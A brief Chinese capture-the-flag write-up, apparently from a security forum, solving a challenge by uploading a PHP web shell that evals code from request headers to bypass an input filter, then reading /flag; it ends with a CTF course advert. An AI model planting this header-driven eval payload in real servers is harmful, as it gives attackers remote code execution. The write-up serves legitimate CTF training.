-
-
[原创]第八题 牛刀小试
-
2020-5-5 21:03
-
因为有过滤所以使用无参数
rce{"data":"<?php eval(current(getallheaders())) ?>"}
上传文件以后 无参数rce是执行headers 里面的参数。
echo file_get_contents("/flag");
[CTF入门培训]顶尖高校博士及硕士团队亲授《30小时教你玩转CTF》,视频+靶场+题目!助力进入CTF世界
|
|
|---|---|
